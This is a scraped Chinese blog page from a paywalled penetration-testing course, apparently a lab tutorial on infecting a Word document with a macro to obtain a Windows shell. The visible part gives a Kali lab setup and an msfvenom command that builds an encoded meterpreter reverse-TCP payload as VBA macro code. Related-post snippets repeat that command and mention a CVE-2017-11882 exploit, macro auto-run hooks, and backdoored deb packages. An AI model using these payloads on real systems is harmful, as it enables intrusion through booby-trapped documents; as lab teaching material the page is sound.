利用宏感染 word 文档获取windows系统的 shell

最新推荐文章于 2022-06-14 14:44:27 发布
最新推荐文章于 2022-06-14 14:44:27 发布
阅读量353 收藏
点赞数
分类专栏: 网络安全全栈课程 渗透测试工具安装教程 文章标签: 宏感染 word文档病毒
本文链接:https://blog.csdn.net/weixin_59679023/article/details/125002304
版权

实验环境:

kali攻击机(192.168.98.30)

window目标机(192.168.98.35)

office 2016

实验步骤:

1、生成后门

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-exe

执行完成后会生成 2 段代码

第一段代码是 MACRO CODE 宏代码

从这里开始:

到这里结束:

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Cwillchris
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
网络安全kali之利用感染word文档获取shell
xueshenlaila的博客
03-25 8173
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
使用病毒反弹shell
qq_42671480的博客
05-23 911
病毒是一种寄存在文档或模板的中的计算机病毒。一旦打开这样的文档,其中的就会被执行,于是病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种病毒,而且如果其他用户打开感染病毒文档病毒又会转移到他的计算机上。那么,病毒是如何产生的呢? 准备环境 kali 攻击机 win7 靶机 生成payload 使用kali虚拟机,输入以下...
MSF利用病毒感染word文档获取shell复现
永远是少年
06-14 2120
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用病毒感染word文档获取shell复现。 一、环境准备 二、文档生成 三、效果检验
office漏洞利用--获取shell
weixin_33842304的博客
12-11 165
  环境:   kali系统windows系统   流程:   在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招      第一种利用方式, 适合测试用:     从git下载代码: git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码, 会在当前...
Windows Shell SDK 中文文档
06-27
Windows Shell SDK 中文文档》提供了关于Windows Shell开发的详细信息,主要分为Shell开发人员指南、Shell参考和Shell示例三大部分。Windows ShellWindows操作系统的核心组成部分,它为用户提供访问和管理操作...
获取磁盘IO与系统负载Load的shell脚本
01-10
1,提取系统负载信息 代码如下:#!/bin/shhost=$(hostname)channel=$(hostname | sed ‘s/[0-9]//g’)runday=$(date +%Y-%m-%d)IPhost=$(/sbin/ifconfig | grep ‘inet addr:’| grep -v ‘127.0.0.1’ | cut -d: -...
Windows+Shell扩展编程完全指南.zip
09-01
在IT领域,Windows Shell扩展是一种强大的技术,它允许开发者自定义Windows操作系统的用户界面,以增强文件和文件夹的操作体验。本指南将深入探讨Windows Shell扩展编程,包括如何创建缩略图视图、右键菜单以及其他...
Windows10系统Shell32中默认图标下载
07-26
Windows操作系统中,Shell32.dll是一个非常重要的动态链接库文件,它包含了系统中的大量界面元素,包括我们常见的文件、文件夹以及各种程序的图标。这些图标是Windows用户界面的重要组成部分,为用户提供了一致且...
windows shell编程
07-30
Windows Shell编程是Windows操作系统下的一种交互式环境编程技术,它允许用户通过命令行接口执行系统操作,编写脚本实现自动化任务。尽管随着图形用户界面(GUI)的发展,像JavaScript、Python和Java这样的高级编程...
office病毒反弹shell实验
AFCC_的博客(Web_Dog)
12-10 1094
0x00 什么是病毒 病毒就是Word中被嵌入的带有恶意行为的代码(VBA代码),当打开带有病毒word文档时,嵌入其中的代码会自动运行 Word 将下列名称识别为自动,或称“auto”,当相应动作被执行,会自动调用满足条件的VBA代码。 AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen:每次打开已有文档时 ...
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4377
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统病毒利用这一点得到了大范围的传播。 构造一个包含病毒Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 856
本节学习客户端渗透
利用0day-java环境-感染-安卓客户端进行渗透
m0_47510703的博客
01-30 6002
一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell 0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。 CVE-2018-8174 漏洞影响最新版本的 IE 浏览器及使
Metasploit framework(七)——客户端渗透
Jeromeyoung
03-30 429
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 在无法突破网络边界的情况下转而攻击客户端有一些思路,如: 1、社会工程学攻击 2、进而渗透线上业务网...
恶意软件“八月”利用powershell进行无文件感染
weixin_34304013的博客
09-04 439
本文讲的是 恶意软件“八月”利用powershell进行无文件感染,Proofpoint安全研究专家提醒,一种叫做“八月”(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播。 这个恶意软件是由高度个性化的TA530为载体来传播的,研究者表示,“八月”传播的目标是零售商的客服、管理人员...
利用deb包-0day-java环境-安卓客户端进行渗透
Q先生
07-20 1082
利用deb包-0day-java环境-安卓客户端进行渗透 1 制作恶意deb软件包来触发后门 制作恶意deb软件来触发后门一共分3步 下载软件包 解包 植入后门 1.1 下载软件包 apt install --download-only freesweep cp /var/cache/apt/archives/freesweep_1.0.1-1_amd64.deb ./ 1.2 解压包 dpkg -x freesweep_1.0.1-1_amd64.deb free cd free 1.
大数据技术分享 Spark技术讲座 荷兰铁路的预测性维护 共32页.pdf
最新发布
07-18
大数据技术分享 Spark技术讲座 荷兰铁路的预测性维护 共32页.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cwillchris

你的鼓励将让我产出更多优质干货

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值